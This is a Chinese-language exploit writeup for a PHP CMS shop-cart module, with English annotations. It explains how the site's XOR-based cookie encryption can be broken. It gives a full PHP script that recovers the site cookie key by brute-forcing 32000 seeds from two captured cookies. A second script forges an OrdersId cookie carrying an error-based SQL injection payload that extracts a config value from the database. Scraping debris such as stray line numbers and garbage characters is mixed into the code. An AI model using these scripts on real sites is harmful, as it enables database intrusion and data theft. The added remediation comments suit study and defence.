www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中，
先看一下这个 shopcar 类是如何生成 cookie 的：
// include/shopcar.class.php, lines 239-250 as quoted in the writeup.
// Stores one shop-cart value in a cookie. Arrays are first flattened by
// enCode() (per the writeup, into a=yy&b=cc form); every value then goes
// through enCrypt(). Neither enCrypt() nor setKey() adds an integrity tag,
// so the cookie is obfuscated but not authenticated.
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s (10 h) lifetime, site-wide path; no HttpOnly/Secure flags are passed.
    setcookie($key,$value,time()+36000,’/');
}
简单地说，$key 就是 cookie 的 key，$value 就是 value；enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的字符串，关键在于 enCrypt 函数：
// include/shopcar.class.php, lines 186-198 as quoted in the writeup.
// Obfuscates $txt with a fresh per-call key, passes the result through
// setKey() and base64-encodes it. Weaknesses visible in this block:
//  - rand() seeded from microtime() is not a CSPRNG, and rand(0, 32000)
//    admits only 32 001 distinct $encrypt_key values; random_bytes()
//    (or an equivalent CSPRNG) would be the replacement.
//  - the per-call key is written into the output itself, interleaved with
//    the XORed bytes, so it adds variation but no secrecy.
//  - nothing here authenticates the result; an HMAC over the output,
//    verified on decode, is what would actually prevent forgery.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));   // 32 hex chars drawn from a tiny seed space
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once all 32 key chars have been used
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // emit the key char, then the plaintext byte XOR that same key char
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
// include/shopcar.class.php, lines 213-225 as quoted in the writeup.
// Repeating-key XOR of $txt with md5(strtolower($cfg_cookie_encode)), the
// site-wide cookie secret. XOR with a fixed 32-byte key is trivially
// reversible and gives no integrity: whoever knows the key can produce
// cookies the site accepts, and a known plaintext exposes key bytes.
// strtolower() before hashing also shrinks the effective key space of
// $cfg_cookie_encode. Nothing per-user or per-session is mixed in.
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once all 32 key chars have been used
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt 我们是可知的，返回值就是 cookie 的值，这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp，这个参数在某种意义上我们也是可知的，因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能，我们可以推出 32000 种可能的 $tmp，从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了，忘记说了，我们的目的是推测出 setKey 中 $encrypt_key 的值，然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中，简单过滤掉含非字母数字字符的 key，就只剩下几百个可能的 key；然后我们再重新下一次订单，再获取几百个可能的 key，取交集，得到最终 key。
具体代码如下:
<?php
// Key-recovery script from the writeup. Inputs: two cookies captured after
// two separate orders with the same cart content, and the plaintext string
// (the enCode() output) those cookies were built from.
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
// XORs the first 32 bytes of the base64-decoded cookie with the first 32
// bytes of a candidate pre-setKey() byte string. Because setKey() is plain
// XOR with a 32-byte key, the result is that key whenever the candidate is
// the string the server actually fed into setKey().
function reStrCode($code,$string)
{
    $code = base64_decode($code);
    $key = “”;
    for($i=0 ; $i<32 ; $i++)
    {
        $key .= $string[$i] ^ $code[$i];
    }
    return $key;
}
// Enumerates the per-cookie key seeds enCrypt() can draw from, rebuilds the
// interleaved key/ciphertext string enCrypt() would have produced for
// $plantxt under each, derives the implied site key with reStrCode(), and
// keeps the candidates that look like an md5 hex digest. Returns that
// candidate list (and echoes each candidate as it is found).
function getKeys($cookie,$plantxt)
{
    $tmp = $cookie;
    $results = array();
    for($j=0 ; $j < 32000; $j++)
    {
        // mirror of shopcar.class.php enCrypt() with the seed fixed to $j
        $txt = $plantxt;
        $ctr = 0;
        $tmp = ”;
        $encrypt_key = md5($j);
        for($i =0; $i < strlen($txt); $i ++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        $string = $tmp;
        $code = $cookie;
        $result = reStrCode($code,$string);
        // md5 output is lowercase hex, so anything else cannot be the site key
        if(eregi(‘^[a-z0-9]+$’,$result))
        {
            echo $result.”\n”;
            $results[] = $result;
        }
    }
    return $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
// A candidate that explains both independently generated cookies is taken
// as the site key; the intersection is what the writeup calls the real key.
foreach($results1 as $test1)
{
    foreach($results2 as $test2)
    {
        if($test1 == $test2)
        {
            echo $test1.”\n”;
        }
    }
}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie，
plantxt 可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie。
接着看
+ ?% Q2 a# h6 r6 `* s" J20 class MemberShops
% z5 _ Z$ [' Q% `& H$ C21 {' t# w. h5 i5 T6 u
22 var $OrdersId;
' k% T+ P& O) J( S# g23 var $productsId;1 y) H; n8 l; g- S$ y
24
// include/shopcar.class.php, lines 25-32 (class MemberShops) as quoted.
// The order id is taken from the client-supplied cookie; only when that is
// empty is a fresh one generated. getCookie() is not shown here —
// presumably it reverses enCrypt() — but nothing in this block validates
// the format of a cookie-supplied id before it is stored on the object.
function __construct()
{
    $this->OrdersId = $this->getCookie(“OrdersId”);
    // empty() also rejects "0", so that particular id is never taken from a cookie
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的，
然后
/plus/carbuyaction.php 中的
// /plus/carbuyaction.php, lines 29, 39 and 173 as quoted in the writeup.
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request (cookie-derived, see MemberShops::__construct)
// ... (intervening lines not quoted) ...
// $OrdersId is interpolated into the SQL string unescaped. A prepared
// statement with a bound parameter (or, at minimum, validating the id
// against the format MakeOrders() produces) is the fix, independent of
// how strongly the cookie itself is protected.
$rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了。
通过利用下面代码生成 cookie：
<?php
// Cookie-forging script from the writeup: with the site key known, an
// arbitrary $txt (here the SQL injection payload destined for the OrdersId
// cookie) is wrapped exactly as include/shopcar.class.php wraps cart values.
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
// Local copy of shopcar.class.php setKey(): repeating-key XOR of $txt with
// the recovered site key, read from the global $encrypt_key instead of
// md5(strtolower($cfg_cookie_encode)).
function setKey($txt)
{
    global $encrypt_key;
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
// Local copy of shopcar.class.php enCrypt(). $encrypt_key here is a local
// variable (no global statement), so it does not disturb the global site key
// that setKey() reads. The per-call key is still random, which is why the
// caller below loops until it gets an output it likes.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}
// Keep re-encrypting until the base64 output contains no '+' — presumably
// because '+' would need URL-encoding when sent back as a cookie value.
for($dest =0;$dest = enCrypt($txt);)
{
    if(!strpos($dest,’+'))
    {
        break;
    }
}
echo $dest.”\n”;
?>
$ }, E. ~7 I+ L: x5 \2 {
|